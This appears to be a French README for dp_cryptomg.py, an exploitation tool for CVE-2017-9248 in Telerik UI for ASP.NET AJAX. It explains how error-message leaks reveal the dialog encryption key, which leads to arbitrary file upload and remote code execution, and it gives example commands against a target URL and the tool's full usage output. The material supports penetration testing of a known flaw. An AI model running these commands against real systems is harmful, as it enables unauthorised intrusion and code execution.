
Un autre outil pour exploiter CVE-2017-9248, une faiblesse cryptographique dans le gestionnaire de boîte de dialogue Telerik UI pour ASP.NET AJAX.
Un autre outil pour exploiter CVE-2017-9248, une faiblesse cryptographique dans le gestionnaire de boîte de dialogue Telerik UI pour ASP.NET AJAX. L'exploitation permet d'accéder à un utilitaire de gestion de fichiers capable de téléverser des fichiers arbitraires, ce qui mène généralement à une exécution de code à distance.
La vulnérabilité est causée par une fuite d'informations via les messages d'erreur lors du déchiffrement des "DialogParameters" de Telerik, qui sont une série de valeurs de configuration chiffrées. Ces valeurs sont fournies à l'utilisateur, puis renvoyées au serveur comme entrée utilisateur. Les informations divulguées sur le processus de déchiffrement permettent la découverte systématique de la Telerik.Web.UI.DialogParametersEncryptionKey. Pour une analyse approfondie de la vulnérabilité et du fonctionnement de l'outil, consultez notre article de blog : https://blog.blacklanternsecurity.com/p/yet-another-telerik-ui-revisit.

L'outil original pour exploiter CVE-2017-9248, dp_crypto, a été inestimable pour créer celui-ci. Sans parler qu'il nous a apporté beaucoup de RCE au fil des ans :)
Les recherches de SR Labs dans leur article de blog Atteindre une exécution de code à distance Telerik 100 fois plus rapide ont servi de base à la technique utilisée dans cet outil et nous ont inspirés à le créer
Exemple (utilisation de base) :
python3 dp_cryptomg.py http://example.com/Telerik.Web.UI.DialogHandler.aspx
Exemple (définition d'une longueur de clé personnalisée et utilisation d'un proxy) :
python3 dp_cryptomg.py -l 40 -p http://127.0.0.1:8080 http://example.com/Telerik.Web.UI.DialogHandler.aspx
usage: dp_cryptomg.py [-h] [-d] [-c COOKIE] [-k KNOWN_KEY] [-v VERSION] [-l LENGTH] [-p PROXY] [-s] [-S] url
positional arguments:
url The target URL
optional arguments:
-h, --help show this help message and exit
-d, --debug Enable debugging mode
-c COOKIE, --cookie COOKIE
Add optional cookie header to every request
-k KNOWN_KEY, --known-key KNOWN_KEY
The partial or complete known key, in HEX format
-v VERSION, --version VERSION
Specify the Telerik version, if known
-l LENGTH, --length LENGTH
The length of the key, if known
-p PROXY, --proxy PROXY
Optionally set an HTTP proxy
-s, --simple Turn off the fancy interface
-S, --super-simple Turn off the fancy interface and show minimal output
-q, --quick-check Only detect likely vulnerability and skip exploitation (forces simple mode)
Telerik.Web.UI.DialogHandler.aspx et Telerik.Web.UI.SpellCheckHandler.axd